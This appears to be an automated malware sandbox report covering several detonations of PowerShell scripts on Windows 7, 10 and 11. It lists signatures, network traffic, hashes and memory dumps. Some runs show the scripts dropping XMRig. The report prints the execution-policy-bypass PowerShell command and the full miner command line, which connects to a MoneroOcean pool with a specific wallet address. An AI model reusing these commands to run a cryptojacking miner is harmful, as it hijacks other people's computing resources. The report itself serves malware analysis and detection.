Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4880 wrote to memory of 3256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4880 wrote to memory of 3256 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 52.111.229.48:443 | tcp | |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| NL | 52.142.223.178:80 | tcp | |
| US | 8.8.8.8:53 | 130.211.222.173.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.189.21.2.in-addr.arpa | udp |
Files
memory/4880-4-0x00007FFA64193000-0x00007FFA64194000-memory.dmp
memory/4880-5-0x000001E940F90000-0x000001E940FB2000-memory.dmp
memory/4880-6-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-9-0x000001E9595C0000-0x000001E959636000-memory.dmp
memory/4880-10-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_n2vyj2g2.zjo.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/4880-25-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-48-0x000001E941040000-0x000001E941052000-memory.dmp
memory/4880-61-0x000001E941020000-0x000001E94102A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3256-90-0x000001839B300000-0x000001839B320000-memory.dmp
memory/3256-91-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-92-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/4880-93-0x00007FFA64193000-0x00007FFA64194000-memory.dmp
memory/4880-94-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/4880-95-0x00007FFA64190000-0x00007FFA64B7C000-memory.dmp
memory/3256-96-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-97-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-98-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-99-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-100-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-101-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-102-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-103-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-104-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-105-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-106-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-107-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-108-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-109-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-110-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-111-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-112-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-113-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-114-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-115-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-116-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-117-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-118-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-119-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-120-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-121-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-122-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-123-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-124-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-125-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-126-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-127-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-128-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-129-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-130-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-131-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-132-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-133-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-134-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-135-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-136-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-137-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-138-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-139-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-140-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-141-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-142-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-143-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-144-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-145-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-146-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-147-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-148-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-149-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-150-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-151-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-152-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-153-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-154-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-155-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
memory/3256-156-0x00007FF6DB710000-0x00007FF6DC343000-memory.dmp
Analysis: behavioral32
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:18
Platform
win11-20240508-en
Max time kernel
1646s
Max time network
1657s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| IE | 52.111.236.22:443 | tcp |
Files
memory/2632-0-0x00007FFF8D633000-0x00007FFF8D635000-memory.dmp
memory/2632-6-0x000001B849210000-0x000001B849232000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cisfmsdk.qxc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2632-10-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp
memory/2632-11-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp
memory/2632-12-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp
memory/2632-13-0x00007FFF8D630000-0x00007FFF8E0F2000-memory.dmp
memory/2632-14-0x00007FFF8D633000-0x00007FFF8D635000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 15:50
Platform
win10-20240404-en
Max time kernel
1796s
Max time network
1805s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5056 wrote to memory of 1736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5056 wrote to memory of 1736 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.111.78.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.107.17.2.in-addr.arpa | udp |
Files
memory/5056-2-0x00007FF8153F3000-0x00007FF8153F4000-memory.dmp
memory/5056-5-0x000001E8C8F40000-0x000001E8C8F62000-memory.dmp
memory/5056-7-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
memory/5056-10-0x000001E8C90F0000-0x000001E8C9166000-memory.dmp
memory/5056-11-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5qsnrce.mre.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5056-28-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
memory/5056-52-0x000001E8C90D0000-0x000001E8C90E2000-memory.dmp
memory/5056-65-0x000001E8C90B0000-0x000001E8C90BA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1736-94-0x00000184BB6A0000-0x00000184BB6C0000-memory.dmp
memory/5056-95-0x00007FF8153F3000-0x00007FF8153F4000-memory.dmp
memory/5056-96-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
memory/1736-97-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/5056-98-0x00007FF8153F0000-0x00007FF815DDC000-memory.dmp
memory/1736-99-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-100-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-101-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-102-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-103-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-104-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-105-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-106-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-107-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-108-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-109-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-110-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-111-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-112-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-113-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-114-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-115-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-116-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-117-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-118-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-119-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-120-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-121-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-122-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-123-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-124-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-125-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-126-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-127-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-128-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-129-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-130-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-131-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-132-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-133-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-134-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-135-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-136-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-137-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-138-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-139-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-140-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-141-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-142-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-143-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-144-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-145-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-146-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-147-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-148-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-149-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-150-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-151-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-152-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-153-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-154-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-155-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-156-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-157-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-158-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-159-0x00007FF614920000-0x00007FF615553000-memory.dmp
memory/1736-160-0x00007FF614920000-0x00007FF615553000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:09
Platform
win11-20240419-en
Max time kernel
1765s
Max time network
1777s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/2440-0-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ttbimhkb.tdq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2440-9-0x000001A87C190000-0x000001A87C1B2000-memory.dmp
memory/2440-10-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-11-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-12-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-13-0x00007FF8A3870000-0x00007FF8A4332000-memory.dmp
memory/2440-14-0x00007FF8A3873000-0x00007FF8A3875000-memory.dmp
Analysis: behavioral25
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:14
Platform
win7-20240508-en
Max time kernel
1559s
Max time network
1559s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
Files
memory/1252-4-0x000007FEF57EE000-0x000007FEF57EF000-memory.dmp
memory/1252-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp
memory/1252-6-0x0000000001E00000-0x0000000001E08000-memory.dmp
memory/1252-7-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-9-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-10-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-11-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-8-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
memory/1252-12-0x000007FEF5530000-0x000007FEF5ECD000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:16
Platform
win11-20240508-en
Max time kernel
1742s
Max time network
1751s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
memory/2628-0-0x00007FFD081D3000-0x00007FFD081D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d0u44g2s.p3r.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
